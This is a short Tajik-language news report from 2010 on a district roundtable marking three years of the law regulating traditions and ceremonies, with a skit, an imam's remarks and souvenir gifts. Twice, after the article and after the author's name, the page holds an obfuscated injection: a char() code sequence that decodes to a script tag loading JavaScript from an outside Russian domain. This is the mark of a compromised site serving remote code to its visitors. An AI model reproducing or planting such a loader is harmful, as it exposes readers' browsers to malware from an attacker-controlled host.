8.06.2010
Барномаи Мизи мудаввари ноҳияви
Дар тарабхонаи «Ёдгорҷон» барномаи мизи мудавари ноҳияви бахшида ба 3 солагии қабули Қонуни Ҷумҳурии Тоҷикистон «Дар бораи танзими анъана ва ҷашну маросимҳо» баргузор гардид. Таи 3 соли охир Қонун дар бораи тантана ва ҷашну маросимҳо амал мекунад. Мақсади ҳамоише, ки баргузор гардид, як андоза таҳлил ва натиҷабардори аз амали гаштани дар санади боло зикр гардида буд. Роҷеа ба ин аз тарафи сокинони ҷамоати Исфисор саҳнача бо номи «Баҳси баргузории тӯйи домодию арӯси байни волидайн ва домодшаванда намоиш дода шуд, ки иштирокчиён аз рӯи саҳначаи намоишдодашуда мубоҳиса намуданд. Имомхатиби ҷамоати Исфисор Муҳаммадҷон Ортиқов ба сухан баромада, аз ҷумла чунин гуфт: Мо имомхатибони ҷамоатҳо тасдиқи Қонуни Ҷумҳурии Тоҷикистонро дасгири менамоем. Дар интиҳо ба сармутахассисони танзими анъана ва ҷашну маросимҳои 12 ҷамоат тӯҳфаҳои хотирави аз ҷониби ҷонишини раиси комиссияи доимии танзими анъана ва ҷашну маросимҳои ноҳия Муҳаббат Бобоҷонова супорида шуд.
char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)fa506e2fbcf309107dcce3718f7c5dc1.js" type="text/javascript">
Нодира Дадобоева
char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)fa506e2fbcf309107dcce3718f7c5dc1.js" type="text/javascript">

